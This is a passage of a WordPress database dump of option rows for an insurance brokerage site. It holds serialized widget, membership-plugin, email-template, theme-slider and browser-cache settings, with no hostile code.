Social\";s:8:\"facebook\";s:20:\"http://facebook.com/\";s:7:\"twitter\";s:19:\"http://twitter.com/\";s:4:\"link\";s:0:\"\";s:4:\"yout\";s:0:\"\";s:5:\"gplus\";s:0:\"\";s:10:\"fb_img_url\";s:19:\"about-title-img.png\";s:10:\"tw_img_url\";s:19:\"about-title-img.png\";s:10:\"gp_img_url\";s:0:\"\";s:10:\"yt_img_url\";s:0:\"\";s:10:\"li_img_url\";s:0:\"\";s:8:\"footcopy\";s:0:\"\";}i:7;a:12:{s:5:\"title\";s:0:\"\";s:8:\"facebook\";s:0:\"\";s:7:\"twitter\";s:0:\"\";s:4:\"link\";s:0:\"\";s:4:\"yout\";s:0:\"\";s:5:\"gplus\";s:0:\"\";s:10:\"fb_img_url\";s:0:\"\";s:10:\"tw_img_url\";s:0:\"\";s:10:\"gp_img_url\";s:0:\"\";s:10:\"yt_img_url\";s:0:\"\";s:10:\"li_img_url\";s:0:\"\";s:8:\"footcopy\";s:0:\"\";}i:8;a:12:{s:5:\"title\";s:0:\"\";s:8:\"facebook\";s:0:\"\";s:7:\"twitter\";s:0:\"\";s:4:\"link\";s:0:\"\";s:4:\"yout\";s:0:\"\";s:5:\"gplus\";s:0:\"\";s:10:\"fb_img_url\";s:0:\"\";s:10:\"tw_img_url\";s:0:\"\";s:10:\"gp_img_url\";s:0:\"\";s:10:\"yt_img_url\";s:0:\"\";s:10:\"li_img_url\";s:0:\"\";s:8:\"footcopy\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(203,'widget_social_medi','a:2:{i:3;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(206,'widget_trleadgen3widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(213,'widget_black3-studio-tinymce','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(214,'widget_featured_tools_sidebar','a:5:{i:3;a:2:{s:5:\"title\";s:35:\"First Section <strong>Here</strong>\";s:7:\"post_no\";s:0:\"\";}i:4;a:2:{s:5:\"title\";s:35:\"First Section <strong>Here</strong>\";s:7:\"post_no\";s:0:\"\";}i:5;a:2:{s:5:\"title\";s:35:\"First Section <strong>Here</strong>\";s:7:\"post_no\";s:0:\"\";}i:7;a:3:{s:5:\"title\";s:8:\"Featured\";s:6:\"title2\";s:5:\"Tools\";s:7:\"post_no\";s:1:\"5\";}s:12:\"_multiwidget\";i:1;}','yes'),(215,'widget_blog_page_sidebar','a:3:{i:2;a:1:{s:7:\"post_no\";s:1:\"4\";}i:4;a:3:{s:5:\"title\";s:8:\"Featured\";s:6:\"title2\";s:5:\"Tools\";s:7:\"post_no\";s:1:\"5\";}s:12:\"_multiwidget\";i:1;}','yes'),(246,'widget_black4-studio-tinymce','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(271,'widget_contact_form','a:3:{i:2;a:3:{s:5:\"title\";s:10:\"Contact Us\";s:6:\"title2\";s:3:\"NOW\";s:9:\"email_add\";s:21:\"Cheskel@empireins.com\";}i:3;a:3:{s:5:\"title\";s:10:\"Contact Us\";s:6:\"title2\";s:3:\"NOW\";s:9:\"email_add\";s:21:\"Cheskel@empireins.com\";}s:12:\"_multiwidget\";i:1;}','yes'),(272,'widget_newslater','a:2:{i:2;a:2:{s:5:\"title\";s:11:\"Sign up for\";s:6:\"title2\";s:4:\"News\";}s:12:\"_multiwidget\";i:1;}','yes'),(320,'_transient_random_seed','1c0ac5adaa345b2dd2a8d7cb34325b45','yes'),(339,'wpmembers_settings','a:16:{s:7:\"version\";s:5:\"3.0.6\";s:6:\"notify\";s:1:\"1\";s:7:\"mod_reg\";s:1:\"1\";s:7:\"captcha\";s:1:\"3\";s:7:\"use_exp\";i:0;s:9:\"use_trial\";i:0;s:8:\"warnings\";i:0;s:10:\"user_pages\";a:3:{s:7:\"profile\";s:37:\"http://www.empireins.com/?page_id=171\";s:8:\"register\";s:37:\"http://www.empireins.com/?page_id=169\";s:5:\"login\";s:0:\"\";}s:6:\"cssurl\";s:79:\"http://www.empireins.com/wp-content/plugins/wp-members/css/generic-no-float.css\";s:5:\"style\";s:79:\"http://www.empireins.com/wp-content/plugins/wp-members/css/generic-no-float.css\";s:6:\"autoex\";a:2:{s:7:\"auto_ex\";i:0;s:11:\"auto_ex_len\";s:0:\"\";}s:6:\"attrib\";i:0;s:5:\"block\";a:6:{s:4:\"post\";s:1:\"0\";s:4:\"page\";s:1:\"0\";s:12:\"testimonials\";i:0;s:7:\"clients\";i:0;s:14:\"featured_tools\";i:0;s:11:\"agent_tools\";i:0;}s:12:\"show_excerpt\";a:6:{s:4:\"post\";i:0;s:4:\"page\";i:0;s:12:\"testimonials\";i:0;s:7:\"clients\";i:0;s:14:\"featured_tools\";i:0;s:11:\"agent_tools\";i:0;}s:10:\"show_login\";a:6:{s:4:\"post\";s:1:\"1\";s:4:\"page\";s:1:\"1\";s:12:\"testimonials\";i:0;s:7:\"clients\";i:0;s:14:\"featured_tools\";i:0;s:11:\"agent_tools\";i:0;}s:8:\"show_reg\";a:6:{s:4:\"post\";s:1:\"1\";s:4:\"page\";s:1:\"1\";s:12:\"testimonials\";i:0;s:7:\"clients\";i:0;s:14:\"featured_tools\";i:0;s:11:\"agent_tools\";i:0;}}','yes'),(340,'wpmembers_fields','a:17:{i:0;a:7:{i:0;i:1;i:1;s:10:\"First Name\";i:2;s:10:\"first_name\";i:3;s:4:\"text\";i:4;s:1:\"y\";i:5;s:1:\"y\";i:6;s:1:\"y\";}i:1;a:7:{i:0;i:2;i:1;s:9:\"Last Name\";i:2;s:9:\"last_name\";i:3;s:4:\"text\";i:4;s:1:\"y\";i:5;s:1:\"y\";i:6;s:1:\"y\";}i:2;a:7:{i:0;i:3;i:1;s:9:\"Address 1\";i:2;s:5:\"addr1\";i:3;s:4:\"text\";i:4;s:1:\"y\";i:5;s:1:\"y\";i:6;s:1:\"n\";}i:3;a:7:{i:0;i:4;i:1;s:9:\"Address 2\";i:2;s:5:\"addr2\";i:3;s:4:\"text\";i:4;s:1:\"y\";i:5;s:1:\"n\";i:6;s:1:\"n\";}i:4;a:7:{i:0;i:5;i:1;s:4:\"City\";i:2;s:4:\"city\";i:3;s:4:\"text\";i:4;s:1:\"y\";i:5;s:1:\"y\";i:6;s:1:\"n\";}i:5;a:7:{i:0;i:6;i:1;s:5:\"State\";i:2;s:8:\"thestate\";i:3;s:4:\"text\";i:4;s:1:\"y\";i:5;s:1:\"y\";i:6;s:1:\"n\";}i:6;a:7:{i:0;i:7;i:1;s:3:\"Zip\";i:2;s:3:\"zip\";i:3;s:4:\"text\";i:4;s:1:\"y\";i:5;s:1:\"y\";i:6;s:1:\"n\";}i:7;a:7:{i:0;i:8;i:1;s:7:\"Country\";i:2;s:7:\"country\";i:3;s:4:\"text\";i:4;s:1:\"y\";i:5;s:1:\"y\";i:6;s:1:\"n\";}i:8;a:7:{i:0;i:9;i:1;s:9:\"Day Phone\";i:2;s:6:\"phone1\";i:3;s:4:\"text\";i:4;s:1:\"y\";i:5;s:1:\"y\";i:6;s:1:\"n\";}i:9;a:7:{i:0;i:10;i:1;s:5:\"Email\";i:2;s:10:\"user_email\";i:3;s:4:\"text\";i:4;s:1:\"y\";i:5;s:1:\"y\";i:6;s:1:\"y\";}i:10;a:7:{i:0;i:11;i:1;s:13:\"Confirm Email\";i:2;s:13:\"confirm_email\";i:3;s:4:\"text\";i:4;s:1:\"n\";i:5;s:1:\"n\";i:6;s:1:\"n\";}i:11;a:7:{i:0;i:12;i:1;s:7:\"Website\";i:2;s:8:\"user_url\";i:3;s:4:\"text\";i:4;s:1:\"n\";i:5;s:1:\"n\";i:6;s:1:\"y\";}i:12;a:7:{i:0;i:13;i:1;s:17:\"Biographical Info\";i:2;s:11:\"description\";i:3;s:8:\"textarea\";i:4;s:1:\"n\";i:5;s:1:\"n\";i:6;s:1:\"y\";}i:13;a:7:{i:0;i:14;i:1;s:8:\"Password\";i:2;s:8:\"password\";i:3;s:8:\"password\";i:4;s:1:\"n\";i:5;s:1:\"n\";i:6;s:1:\"n\";}i:14;a:7:{i:0;i:15;i:1;s:16:\"Confirm Password\";i:2;s:16:\"confirm_password\";i:3;s:8:\"password\";i:4;s:1:\"n\";i:5;s:1:\"n\";i:6;s:1:\"n\";}i:15;a:9:{i:0;i:16;i:1;s:3:\"TOS\";i:2;s:3:\"tos\";i:3;s:8:\"checkbox\";i:4;s:1:\"n\";i:5;s:1:\"n\";i:6;s:1:\"n\";i:7;s:5:\"agree\";i:8;s:1:\"n\";}i:16;a:7:{i:0;i:18;i:1;s:20:\"Broker Gear Username\";i:2;s:10:\"bgusername\";i:3;s:4:\"text\";i:4;s:1:\"n\";i:5;s:1:\"n\";i:6;s:1:\"n\";}}','yes'),(341,'wpmembers_dialogs','a:9:{i:0;s:119:\"This content is restricted to site members. If you are an existing user, please log in. New users may register below.\";i:1;s:50:\"Sorry, that username is taken, please try another.\";i:2;s:74:\"Sorry, that email address already has an account.<br />Please try another.\";i:3;s:124:\"Congratulations! Your registration was successful.<br /><br />You may now log in using the password that was emailed to you.\";i:4;s:29:\"Your information was updated!\";i:5;s:53:\"Passwords did not match.<br /><br />Please try again.\";i:6;s:30:\"Password successfully changed!\";i:7;s:65:\"Either the username or email address do not exist in our records.\";i:8;s:135:\"Password successfully reset!<br /><br />An email containing a new password has been sent to the email address on file for your account.\";}','yes'),(342,'wpmembers_tos','Put your TOS (Terms of Service) text here. You can use HTML markup.','yes'),(343,'wpmembers_email_newreg','a:2:{s:4:\"subj\";s:37:\"Your registration info for [blogname]\";s:4:\"body\";s:268:\"Thank you for registering for [blogname]\r\n\r\nYour registration information is below.\r\nYou may wish to retain a copy for your records.\r\n\r\nusername: [username]\r\npassword: [password]\r\n\r\nYou may login here:\r\n[reglink]\r\n\r\nYou may change your password here:\r\n[members-area]\r\n\";}','yes'),(344,'wpmembers_email_newmod','a:2:{s:4:\"subj\";s:40:\"Thank you for registering for [blogname]\";s:4:\"body\";s:173:\"Thank you for registering for [blogname]. \r\nYour registration has been received and is pending approval.\r\nYou will receive login instructions upon approval of your account\r\n\";}','yes'),(345,'wpmembers_email_appmod','a:2:{s:4:\"subj\";s:50:\"Your registration for [blogname] has been approved\";s:4:\"body\";s:299:\"Your registration for [blogname] has been approved.\r\n\r\nYour registration information is below.\r\nYou may wish to retain a copy for your records.\r\n\r\nusername: [username]\r\npassword: [password]\r\n\r\nYou may login and change your password here:\r\n[members-area]\r\n\r\nYou originally registered at:\r\n[reglink]\r\n\";}','yes'),(346,'wpmembers_email_repass','a:2:{s:4:\"subj\";s:34:\"Your password reset for [blogname]\";s:4:\"body\";s:157:\"Your password for [blogname] has been reset\r\n\r\nYour new password is included below. You may wish to retain a copy for your records.\r\n\r\npassword: [password]\r\n\";}','yes'),(347,'wpmembers_email_notify','a:2:{s:4:\"subj\";s:36:\"New user registration for [blogname]\";s:4:\"body\";s:221:\"The following user registered for [blogname] (and is pending approval)\r\n \r\nusername: [username]\r\nemail: [email]\r\n\r\n[fields]\r\nThis user registered here:\r\n[reglink]\r\n\r\nuser IP: [user-ip]\r\n \r\nactivate user: [activate-user]\r\n\";}','yes'),(348,'wpmembers_email_footer','----------------------------------\r\nThis is an automated message from [blogname]\r\nPlease do not reply to this address','yes'),(349,'wpmembers_style','http://www.empireins.com/wp-content/plugins/wp-members/css/generic-no-float.css','yes'),(382,'wpmembers_utfields','','yes'),(391,'wpmembers_attrib','0','yes'),(392,'wpmembers_msurl','http://localhost/empire/?page_id=171','yes'),(393,'wpmembers_regurl','http://localhost/empire/?page_id=169','yes'),(394,'wpmembers_autoex','a:2:{s:7:\"auto_ex\";i:0;s:11:\"auto_ex_len\";s:0:\"\";}','yes'),(403,'widget_widget_wpmemwidget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(404,'widget_slider_sidebar','a:2:{i:2;a:2:{s:5:\"title\";s:18:\"First Section Here\";s:4:\"desc\";s:68:\"Phasellus fringilla vehicula egestas. Class aptent sociosqu advanced\";}s:12:\"_multiwidget\";i:1;}','yes'),(405,'widget_top_sidebar','a:2:{i:3;a:2:{s:8:\"log_link\";s:37:\"http://www.empireins.com/agent-tools/\";s:8:\"reg_link\";s:34:\"http://www.empireins.com/register/\";}s:12:\"_multiwidget\";i:1;}','yes'),(406,'widget_credit_line','a:2:{i:2;a:1:{s:4:\"desc\";s:56:\"© 2016 Empire Insurance Brokerage. All Rights Reserved.\";}s:12:\"_multiwidget\";i:1;}','yes'),(411,'atw','a:1:{s:9:\"condition\";a:9:{i:0;a:2:{s:4:\"name\";s:3:\"All\";s:4:\"code\";s:4:\"true\";}i:1;a:2:{s:4:\"name\";s:9:\"Home Page\";s:4:\"code\";s:9:\"is_home()\";}i:2;a:2:{s:4:\"name\";s:10:\"Front Page\";s:4:\"code\";s:15:\"is_front_page()\";}i:3;a:2:{s:4:\"name\";s:4:\"Page\";s:4:\"code\";s:13:\"is_page($arg)\";}i:4;a:2:{s:4:\"name\";s:11:\"Single Post\";s:4:\"code\";s:15:\"is_single($arg)\";}i:5;a:2:{s:4:\"name\";s:16:\"Post in Category\";s:4:\"code\";s:17:\"in_category($arg)\";}i:6;a:2:{s:4:\"name\";s:8:\"Category\";s:4:\"code\";s:17:\"is_category($arg)\";}i:7;a:2:{s:4:\"name\";s:4:\"Blog\";s:4:\"code\";s:40:\"is_home() || is_single() || is_archive()\";}i:8;a:2:{s:4:\"name\";s:19:\"Search Results Page\";s:4:\"code\";s:11:\"is_search()\";}}}','yes'),(450,'option_tree','a:8:{s:10:\"Background\";a:6:{s:16:\"background-color\";s:0:\"\";s:17:\"background-repeat\";s:9:\"no-repeat\";s:21:\"background-attachment\";s:5:\"fixed\";s:19:\"background-position\";s:0:\"\";s:15:\"background-size\";s:0:\"\";s:16:\"background-image\";s:74:\"http://www.empireins.com/wp-content/uploads/2014/04/content-wrapper-bg.png\";}s:8:\"logo_img\";s:0:\"\";s:11:\"logo_slogan\";s:0:\"\";s:10:\"FooterText\";s:0:\"\";s:9:\"my_slider\";a:3:{i:1;a:4:{s:5:\"title\";s:0:\"\";s:5:\"image\";s:65:\"http://www.empireins.com/wp-content/uploads/2014/04/slide-1-1.png\";s:6:\"title2\";s:0:\"\";s:11:\"description\";s:123:\"<p><strong>EMPIRE INSURANCE BROKERAGE\r\n<br></strong>Offering a Broad Selection of Top Rated Insurance Carriers</strong></p>\";}i:3;a:4:{s:5:\"title\";s:0:\"\";s:5:\"image\";s:68:\"http://www.empireins.com/wp-content/uploads/2014/04/eib-slider-1.png\";s:6:\"title2\";s:0:\"\";s:11:\"description\";s:122:\"<p><strong>EMPIRE INSURANCE BROKERAGE\r\n<br></strong>A Team of Experienced, Responsive Insurance Professionals</strong></p>\";}i:0;a:4:{s:5:\"title\";s:0:\"\";s:5:\"image\";s:68:\"http://www.empireins.com/wp-content/uploads/2014/04/eib-slider-2.png\";s:6:\"title2\";s:0:\"\";s:11:\"description\";s:112:\"<p><strong>EMPIRE INSURANCE BROKERAGE\r\n<br></strong>Serving the Life Brokerage Community Since 1992</strong></p>\";}}s:8:\"MetaTags\";s:0:\"\";s:16:\"MetaDescriptions\";s:0:\"\";s:15:\"GoogleAnalytics\";s:0:\"\";}','yes'),(650,'auto_core_update_notified','a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:15:\"mamub@gmail.com\";s:7:\"version\";s:5:\"4.1.8\";s:9:\"timestamp\";i:1442356004;}','yes'),(1602,'cpto_options','a:5:{s:23:\"show_reorder_interfaces\";a:6:{s:4:\"post\";s:4:\"show\";s:10:\"attachment\";s:4:\"show\";s:12:\"testimonials\";s:4:\"show\";s:7:\"clients\";s:4:\"show\";s:14:\"featured_tools\";s:4:\"show\";s:11:\"agent_tools\";s:4:\"show\";}s:8:\"autosort\";i:1;s:9:\"adminsort\";i:1;s:10:\"capability\";s:13:\"publish_posts\";s:21:\"navigation_sort_apply\";i:1;}','yes'),(1603,'CPT_configured','TRUE','yes'),(2365,'WPLANG','','yes'),(2366,'db_upgraded','','yes'),(2585,'_site_transient_timeout_browser_a344c581ee2eff9c9c4fcdf9997f17a9','1431456620','yes'),(2586,'_site_transient_browser_a344c581ee2eff9c9c4fcdf9997f17a9','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"42.0.2311.135\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(2587,'_site_transient_timeout_browser_638f2c26eca2d09fa942a9e7be04de90','1431459358','yes'),(2588,'_site_transient_browser_638f2c26eca2d09fa942a9e7be04de90','a:9:{s:8:\"platform\";s:9:\"Macintosh\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"42.0.2311.135\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(2622,'can_compress_scripts','0','yes'),(2662,'_site_transient_timeout_browser_3fc6b4e5639314d139c5d624e9b51b17','1432060969','yes'),(2663,'_site_transient_browser_3fc6b4e5639314d139c5d624e9b51b17','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"42.0.2311.135\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(2712,'_site_transient_timeout_browser_4f067e0096b6e38f47adee69900d393f','1432697085','yes'),(2713,'_site_transient_browser_4f067e0096b6e38f47adee69900d393f','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"42.0.2311.152\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(2739,'_site_transient_timeout_browser_47dca2058296bab976fdf3d6d12dc841','1432744684','yes'),(2740,'_site_transient_browser_47dca2058296bab976fdf3d6d12dc841','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:12:\"43.0.2357.65\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(2783,'_site_transient_timeout_browser_876949766219195f74cc09094f862595','1432916263','yes'),(2784,'_site_transient_browser_876949766219195f74cc09094f862595','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"42.0.2311.152\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(2888,'_site_transient_timeout_browser_a7cef1cfa83607636f838b5bc2f2e819','1435344856','yes'),(2889,'_site_transient_browser_a7cef1cfa83607636f838b5bc2f2e819','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"43.0.2357.124\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(2919,'_site_transient_timeout_browser_61529554428cf8a04735692cc6b771bd','1435607234','yes'),(2920,'_site_transient_browser_61529554428cf8a04735692cc6b771bd','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"43.0.2357.124\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(2950,'_site_transient_timeout_browser_d8b823361163f6c113da8d7fe620aea0','1435676537','yes'),(2951,'_site_transient_browser_d8b823361163f6c113da8d7fe620aea0','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"43.0.2357.130\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(2959,'_site_transient_timeout_browser_afc0dd1f4bdfa183ea07d50c68c58ce7','1435678940','yes'),(2960,'_site_transient_browser_afc0dd1f4bdfa183ea07d50c68c58ce7','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"43.0.2357.130\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(3015,'surelc_gaidvalue','185','yes'),(3016,'surelc_post_url','https://surelc.surancebay.com/sbweb/agency/185','yes'),(3017,'surelc_ganamevalue','EIB','yes'),(3018,'surelc_passwordvalue_field_name','sure_lc_password','yes'),(3019,'surelc_user_authenticated','','yes'),(3020,'surelc_user_unauthenticated','','yes'),(3046,'broker_gear_prefid_field_name','bgusername','yes'),(3047,'broker_gear_target_field_name','c','yes'),(3048,'broker_gear_post_url','https://swww.agencyworks.com/servlet/com.agencyworks.framework.servlets.BGSeamlessLogin','yes'),(3049,'broker_gear_stylesheeturl','EIB','yes'),(3050,'broker_gear_user_authenticated','Check your case status anytime!','yes'),(3051,'broker_gear_user_unauthenticated','','yes'),(3098,'_site_transient_timeout_browser_c5b1639cdf201c6e9d0fe6c6012caacf','1436237562','yes'),(3099,'_site_transient_browser_c5b1639cdf201c6e9d0fe6c6012caacf','a:9:{s:8:\"platform\";s:9:\"Macintosh\";s:4:\"name\";s:7:\"Firefox\";s:7:\"version\";s:4:\"38.0\";s:10:\"update_url\";s:23:\"http://www.firefox.com/\";s:7:\"img_src\";s:50:\"http://s.wordpress.org/images/browsers/firefox.png\";s:11:\"img_src_ssl\";s:49:\"https://wordpress.org/images/browsers/firefox.png\";s:15:\"current_version\";s:2:\"16\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(3323,'_site_transient_timeout_browser_3a343c40138c409717df5b87960d9dd7','1438439405','yes'),(3324,'_site_transient_browser_3a343c40138c409717df5b87960d9dd7','a:9:{s:8:\"platform\";s:9:\"Macintosh\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"43.0.2357.134\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(3380,'_site_transient_timeout_browser_4a1092c04fd5bb33433e788e92eb4ccd','1438551229','yes'),(3381,'_site_transient_browser_4a1092c04fd5bb33433e788e92eb4ccd','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"43.0.2357.134\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(3426,'_site_transient_timeout_browser_ad17c1ed7df82fa5162f7a32bfcc80ed','1438622116','yes'),(3427,'_site_transient_browser_ad17c1ed7df82fa5162f7a32bfcc80ed','a:9:{s:8:\"platform\";s:9:\"Macintosh\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"44.0.2403.107\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(3483,'_site_transient_timeout_browser_6c87615462301d709781c5732ebdb395','1439996876','yes'),(3484,'_site_transient_browser_6c87615462301d709781c5732ebdb395','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"44.0.2403.130\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(3505,'_site_transient_timeout_browser_1d69c1420c3e66b73ba628edd371a1b1','1439999116','yes'),(3506,'_site_transient_browser_1d69c1420c3e66b73ba628edd371a1b1','a:9:{s:8:\"platform\";s:9:\"Macintosh\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"44.0.2403.155\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(3514,'_site_transient_timeout_browser_0d6d4b43f9ed8df113ebdfd8b406513f','1440034997','yes'),(3515,'_site_transient_browser_0d6d4b43f9ed8df113ebdfd8b406513f','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"44.0.2403.130\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(3596,'_site_transient_timeout_browser_9a7cf8307b4beb1ae9b94290cd1e747c','1440603725','yes'),(3597,'_site_transient_browser_9a7cf8307b4beb1ae9b94290cd1e747c','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"44.0.2403.155\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(3637,'_site_transient_timeout_browser_0a4e6fcdce3668f58205e52074f50ed8','1440709353','yes'),(3638,'_site_transient_browser_0a4e6fcdce3668f58205e52074f50ed8','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"44.0.2403.155\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(3668,'team_children','a:0:{}','yes'),(3790,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:6:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:7:\"upgrade\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.5.2.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.5.2.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-4.5.2-no-content.zip\